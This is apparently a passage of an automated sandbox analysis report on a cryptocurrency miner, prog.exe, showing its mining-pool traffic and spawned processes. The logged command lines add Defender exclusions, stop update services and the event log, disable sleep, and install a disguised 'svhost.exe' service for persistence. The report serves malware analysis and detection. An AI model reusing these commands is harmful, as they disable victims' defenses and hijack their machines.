                                                          2024-10-26 14:38:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 33 66 64 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 30 35 66 38 63 33 64 66 61 31 62 33 65 39 38 39 62 33 65 63 61 65 66 33 39 62 62 65 63 63 36 32 39 35 37 62 62 65 66 39 33 36 35 32 62 31 36 36 38 63 39 30 38 36 38 31 35 61 37 61 33 36 31 66 33 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 66 34 36 34 32 62 37 2d 34 36 35 31 2d 34 33 37 31 2d 61 63 62 39 2d 38 63 66 61 32 34 36 38 37 61 35 38 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c3fdf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b16671100000000005f8c3dfa1b3e989b3ecaef39bbecc62957bbef93652b1668c9086815a7a361f35","job_id":"3f4642b7-4651-4371-acb9-8cfa24687a58","ta
                                                          2024-10-26 14:38:06 UTC256OUTData Raw: 7b 22 69 64 22 3a 32 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 73 75 62 6d 69 74 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 69 64 22 3a 22 64 65 34 30 62 35 39 38 2d 37 31 66 39 2d 34 66 64 35 2d 38 37 35 66 2d 64 37 33 63 38 30 65 33 35 39 64 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 66 34 36 34 32 62 37 2d 34 36 35 31 2d 34 33 37 31 2d 61 63 62 39 2d 38 63 66 61 32 34 36 38 37 61 35 38 22 2c 22 6e 6f 6e 63 65 22 3a 22 63 35 30 38 30 30 30 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 36 65 61 39 62 62 63 37 38 61 38 36 34 36 35 31 36 64 32 64 33 35 65 33 66 66 30 64 66 66 61 61 63 31 66 65 30 33 62 37 66 61 63 61 64 32 61 65 61 61 62 61 33 30 63 32 32 64 35 30 30 30 30 30 22 2c 22 61 6c 67 6f 22 3a 22 72 78 2f 30 22 7d 7d 0d
                                                          Data Ascii: {"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"de40b598-71f9-4fd5-875f-d73c80e359dd","job_id":"3f4642b7-4651-4371-acb9-8cfa24687a58","nonce":"c5080000","result":"6ea9bbc78a8646516d2d35e3ff0dffaac1fe03b7facad2aeaaba30c22d500000","algo":"rx/0"}}


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:10:35:44
                                                          Start date:26/10/2024
                                                          Path:C:\Users\user\Desktop\prog.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\prog.exe"
                                                          Imagebase:0x7ff6f1fb0000
                                                          File size:2'663'424 bytes
                                                          MD5 hash:D3ADC3EC7B76556B7FAC591C33F31EA9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:10:35:49
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:10:35:49
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                          Imagebase:0x7ff79f6e0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\wusa.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                          Imagebase:0x7ff781670000
                                                          File size:345'088 bytes
                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop bits
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe delete "appdata"
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe create "appdata" binpath= "C:\ProgramData\win32\svhost.exe" start= "auto"
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:10:36:01
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe start "appdata"
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\ProgramData\win32\svhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProgramData\win32\svhost.exe
                                                          Imagebase:0x7ff7e32f0000
                                                          File size:2'663'424 bytes
                                                          MD5 hash:D3ADC3EC7B76556B7FAC591C33F31EA9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 74%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:37
                                                          Start time:10:36:02
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                          Imagebase:0x7ff79f6e0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:39
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:40
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:42
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\wusa.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                          Imagebase:0x7ff781670000
                                                          File size:345'088 bytes
                                                          MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:10:36:12
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:45
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:46
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:47
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop bits
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:48
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:49
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\sc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                          Imagebase:0x7ff792a20000
                                                          File size:72'192 bytes
                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:50
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:51
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:52
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:53
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:54
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\powercfg.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                          Imagebase:0x7ff755750000
                                                          File size:96'256 bytes
                                                          MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:55
                                                          Start time:10:36:13
                                                          Start date:26/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
